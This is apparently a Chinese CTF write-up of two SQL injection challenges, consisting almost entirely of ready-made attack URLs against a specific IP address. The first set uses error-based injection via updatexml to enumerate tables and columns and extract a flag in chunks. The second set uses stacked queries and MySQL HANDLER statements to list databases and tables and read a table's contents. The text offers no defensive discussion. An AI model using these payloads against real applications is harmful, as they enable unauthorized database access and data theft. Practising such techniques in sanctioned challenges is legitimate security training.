1、报错注入

http://103.47.82.210:8765/login.php?username='admin' order by updatexml(1,if(1=2,1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)),1)

http://103.47.82.210:8765/login.php?username='admin' order by updatexml(1,if(1=2,1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag'),0x7e)),1)

http://103.47.82.210:8765/login.php?username='admin' order by updatexml(1,if(1=2,1,concat(0x7e,substring((select group_concat(flag) from flag),30,30),0x7e)),1)

2、堆叠注入

http://103.47.82.210:8302/?inject=1%27;show%20databases;

http://103.47.82.210:8302/?inject=1%27;use%20supersqli;show%20tables;

http://103.47.82.210:8302/?inject=1%27;use%20supersqli;show%20columns%20from%20`1919810931114514`;

http://103.47.82.210:8302/?inject=1%27;handler%20`1919810931114514`%20open;handler%20`1919810931114514`%20read%20first;

SQL注入两道题

1、报错注入

2、堆叠注入

文章评论